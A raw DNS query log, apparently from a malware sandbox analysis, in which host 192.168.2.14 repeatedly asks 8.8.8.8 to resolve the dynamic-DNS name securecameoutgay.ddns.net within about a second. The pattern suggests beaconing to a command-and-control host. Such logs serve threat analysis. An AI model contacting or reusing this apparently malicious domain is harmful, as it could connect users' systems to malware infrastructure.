                                                    Oct 12, 2024 23:05:36.796611071 CEST192.168.2.148.8.8.80xff33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.803699970 CEST192.168.2.148.8.8.80xff33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.810455084 CEST192.168.2.148.8.8.80xff33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.817266941 CEST192.168.2.148.8.8.80xff33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.823841095 CEST192.168.2.148.8.8.80xa7ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.830554962 CEST192.168.2.148.8.8.80xa7ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.837416887 CEST192.168.2.148.8.8.80xa7ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.843849897 CEST192.168.2.148.8.8.80xa7ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.850434065 CEST192.168.2.148.8.8.80xa7ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.856782913 CEST192.168.2.148.8.8.80x1fa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.863449097 CEST192.168.2.148.8.8.80x1fa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.870022058 CEST192.168.2.148.8.8.80x1fa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.876712084 CEST192.168.2.148.8.8.80x1fa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.883354902 CEST192.168.2.148.8.8.80x1fa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.890024900 CEST192.168.2.148.8.8.80x24ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.896461010 CEST192.168.2.148.8.8.80x24ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.903153896 CEST192.168.2.148.8.8.80x24ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.910069942 CEST192.168.2.148.8.8.80x24ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.916497946 CEST192.168.2.148.8.8.80x24ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.923147917 CEST192.168.2.148.8.8.80xa696Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.929742098 CEST192.168.2.148.8.8.80xa696Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.936238050 CEST192.168.2.148.8.8.80xa696Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.942819118 CEST192.168.2.148.8.8.80xa696Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.950355053 CEST192.168.2.148.8.8.80xa696Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.957575083 CEST192.168.2.148.8.8.80x1a58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.964198112 CEST192.168.2.148.8.8.80x1a58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.970604897 CEST192.168.2.148.8.8.80x1a58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.981465101 CEST192.168.2.148.8.8.80x1a58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.987896919 CEST192.168.2.148.8.8.80x1a58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:36.995338917 CEST192.168.2.148.8.8.80x9a0eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.001954079 CEST192.168.2.148.8.8.80x9a0eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.008527994 CEST192.168.2.148.8.8.80x9a0eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.015250921 CEST192.168.2.148.8.8.80x9a0eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.022119045 CEST192.168.2.148.8.8.80x9a0eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.029253960 CEST192.168.2.148.8.8.80x4f52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.036360025 CEST192.168.2.148.8.8.80x4f52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.042933941 CEST192.168.2.148.8.8.80x4f52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.049268961 CEST192.168.2.148.8.8.80x4f52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.056154013 CEST192.168.2.148.8.8.80x4f52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.062849998 CEST192.168.2.148.8.8.80x1247Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.069446087 CEST192.168.2.148.8.8.80x1247Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.076348066 CEST192.168.2.148.8.8.80x1247Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.082843065 CEST192.168.2.148.8.8.80x1247Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.089413881 CEST192.168.2.148.8.8.80x1247Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.096263885 CEST192.168.2.148.8.8.80xb69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.103307009 CEST192.168.2.148.8.8.80xb69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.109707117 CEST192.168.2.148.8.8.80xb69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.116303921 CEST192.168.2.148.8.8.80xb69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.125673056 CEST192.168.2.148.8.8.80xb69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.132311106 CEST192.168.2.148.8.8.80x3a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.138935089 CEST192.168.2.148.8.8.80x3a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.145837069 CEST192.168.2.148.8.8.80x3a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.152574062 CEST192.168.2.148.8.8.80x3a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.159240007 CEST192.168.2.148.8.8.80x3a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.165632010 CEST192.168.2.148.8.8.80xdc4cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.172271967 CEST192.168.2.148.8.8.80xdc4cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.179044962 CEST192.168.2.148.8.8.80xdc4cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.185669899 CEST192.168.2.148.8.8.80xdc4cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.192816973 CEST192.168.2.148.8.8.80xdc4cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.199564934 CEST192.168.2.148.8.8.80x94a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.206355095 CEST192.168.2.148.8.8.80x94a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.212928057 CEST192.168.2.148.8.8.80x94a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.219655991 CEST192.168.2.148.8.8.80x94a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.226576090 CEST192.168.2.148.8.8.80x94a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.233385086 CEST192.168.2.148.8.8.80x629dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.240288973 CEST192.168.2.148.8.8.80x629dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.247766018 CEST192.168.2.148.8.8.80x629dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.254575014 CEST192.168.2.148.8.8.80x629dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.261260986 CEST192.168.2.148.8.8.80x629dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.268101931 CEST192.168.2.148.8.8.80x1833Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.274557114 CEST192.168.2.148.8.8.80x1833Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.281219959 CEST192.168.2.148.8.8.80x1833Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.288408041 CEST192.168.2.148.8.8.80x1833Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.294817924 CEST192.168.2.148.8.8.80x1833Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.301454067 CEST192.168.2.148.8.8.80xddf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.308001041 CEST192.168.2.148.8.8.80xddf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.314627886 CEST192.168.2.148.8.8.80xddf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.321114063 CEST192.168.2.148.8.8.80xddf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.327596903 CEST192.168.2.148.8.8.80xddf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.334049940 CEST192.168.2.148.8.8.80xaf97Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.341140985 CEST192.168.2.148.8.8.80xaf97Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.348193884 CEST192.168.2.148.8.8.80xaf97Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.354963064 CEST192.168.2.148.8.8.80xaf97Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.361599922 CEST192.168.2.148.8.8.80xaf97Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.368171930 CEST192.168.2.148.8.8.80x3edcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.375117064 CEST192.168.2.148.8.8.80x3edcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.382270098 CEST192.168.2.148.8.8.80x3edcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.389224052 CEST192.168.2.148.8.8.80x3edcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.395822048 CEST192.168.2.148.8.8.80x3edcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.402570963 CEST192.168.2.148.8.8.80x8088Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.409667015 CEST192.168.2.148.8.8.80x8088Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.417135000 CEST192.168.2.148.8.8.80x8088Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.425932884 CEST192.168.2.148.8.8.80x8088Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.432414055 CEST192.168.2.148.8.8.80x8088Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.438987017 CEST192.168.2.148.8.8.80x3e43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.445409060 CEST192.168.2.148.8.8.80x3e43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.452440977 CEST192.168.2.148.8.8.80x3e43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.459017038 CEST192.168.2.148.8.8.80x3e43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.466032028 CEST192.168.2.148.8.8.80x3e43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.472546101 CEST192.168.2.148.8.8.80x2b44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.479509115 CEST192.168.2.148.8.8.80x2b44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.486238956 CEST192.168.2.148.8.8.80x2b44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.492984056 CEST192.168.2.148.8.8.80x2b44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.499779940 CEST192.168.2.148.8.8.80x2b44Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.506477118 CEST192.168.2.148.8.8.80xe62eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.513389111 CEST192.168.2.148.8.8.80xe62eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.520258904 CEST192.168.2.148.8.8.80xe62eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.527075052 CEST192.168.2.148.8.8.80xe62eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.533835888 CEST192.168.2.148.8.8.80xe62eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.540443897 CEST192.168.2.148.8.8.80xaa42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.546730995 CEST192.168.2.148.8.8.80xaa42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.553591013 CEST192.168.2.148.8.8.80xaa42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.560400963 CEST192.168.2.148.8.8.80xaa42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.567969084 CEST192.168.2.148.8.8.80xaa42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.575114965 CEST192.168.2.148.8.8.80x7b8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.581965923 CEST192.168.2.148.8.8.80x7b8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.588594913 CEST192.168.2.148.8.8.80x7b8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.595498085 CEST192.168.2.148.8.8.80x7b8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.602384090 CEST192.168.2.148.8.8.80x7b8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.609378099 CEST192.168.2.148.8.8.80x8be5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.616342068 CEST192.168.2.148.8.8.80x8be5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.623560905 CEST192.168.2.148.8.8.80x8be5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.630464077 CEST192.168.2.148.8.8.80x8be5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.637026072 CEST192.168.2.148.8.8.80x8be5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.643804073 CEST192.168.2.148.8.8.80x181aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.650881052 CEST192.168.2.148.8.8.80x181aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.657511950 CEST192.168.2.148.8.8.80x181aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.664277077 CEST192.168.2.148.8.8.80x181aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.671124935 CEST192.168.2.148.8.8.80x181aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.677923918 CEST192.168.2.148.8.8.80x5b9cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.685055971 CEST192.168.2.148.8.8.80x5b9cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.692230940 CEST192.168.2.148.8.8.80x5b9cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.699060917 CEST192.168.2.148.8.8.80x5b9cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.706023932 CEST192.168.2.148.8.8.80x5b9cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.712469101 CEST192.168.2.148.8.8.80x2fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.719356060 CEST192.168.2.148.8.8.80x2fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.726346970 CEST192.168.2.148.8.8.80x2fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.733190060 CEST192.168.2.148.8.8.80x2fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.739815950 CEST192.168.2.148.8.8.80x2fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.746624947 CEST192.168.2.148.8.8.80x9026Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.753789902 CEST192.168.2.148.8.8.80x9026Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.760153055 CEST192.168.2.148.8.8.80x9026Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.766582966 CEST192.168.2.148.8.8.80x9026Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.773276091 CEST192.168.2.148.8.8.80x9026Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.780180931 CEST192.168.2.148.8.8.80x75faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.787062883 CEST192.168.2.148.8.8.80x75faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.794363976 CEST192.168.2.148.8.8.80x75faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.801233053 CEST192.168.2.148.8.8.80x75faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.807729959 CEST192.168.2.148.8.8.80x75faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.814321995 CEST192.168.2.148.8.8.80x16a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.820955038 CEST192.168.2.148.8.8.80x16a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.827477932 CEST192.168.2.148.8.8.80x16a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.838063955 CEST192.168.2.148.8.8.80x16a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.846421957 CEST192.168.2.148.8.8.80x16a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.853091955 CEST192.168.2.148.8.8.80x9318Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.860349894 CEST192.168.2.148.8.8.80x9318Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.867743015 CEST192.168.2.148.8.8.80x9318Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.874644995 CEST192.168.2.148.8.8.80x9318Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.881331921 CEST192.168.2.148.8.8.80x9318Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.888190985 CEST192.168.2.148.8.8.80xeb77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.894697905 CEST192.168.2.148.8.8.80xeb77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.901474953 CEST192.168.2.148.8.8.80xeb77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.909410000 CEST192.168.2.148.8.8.80xeb77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.915975094 CEST192.168.2.148.8.8.80xeb77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.923260927 CEST192.168.2.148.8.8.80x6070Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.929941893 CEST192.168.2.148.8.8.80x6070Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.937082052 CEST192.168.2.148.8.8.80x6070Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.943439007 CEST192.168.2.148.8.8.80x6070Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.950061083 CEST192.168.2.148.8.8.80x6070Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.957843065 CEST192.168.2.148.8.8.80xc586Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.964579105 CEST192.168.2.148.8.8.80xc586Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.971430063 CEST192.168.2.148.8.8.80xc586Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.977921963 CEST192.168.2.148.8.8.80xc586Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.986821890 CEST192.168.2.148.8.8.80xc586Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:37.993603945 CEST192.168.2.148.8.8.80x6a8fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.000547886 CEST192.168.2.148.8.8.80x6a8fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.007673979 CEST192.168.2.148.8.8.80x6a8fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.014559984 CEST192.168.2.148.8.8.80x6a8fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.021497965 CEST192.168.2.148.8.8.80x6a8fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.028093100 CEST192.168.2.148.8.8.80x883aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.034950972 CEST192.168.2.148.8.8.80x883aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.041640043 CEST192.168.2.148.8.8.80x883aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.048459053 CEST192.168.2.148.8.8.80x883aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.055466890 CEST192.168.2.148.8.8.80x883aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.062138081 CEST192.168.2.148.8.8.80x717fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.068759918 CEST192.168.2.148.8.8.80x717fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:38.075428009 CEST192.168.2.148.8.8.80x717fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
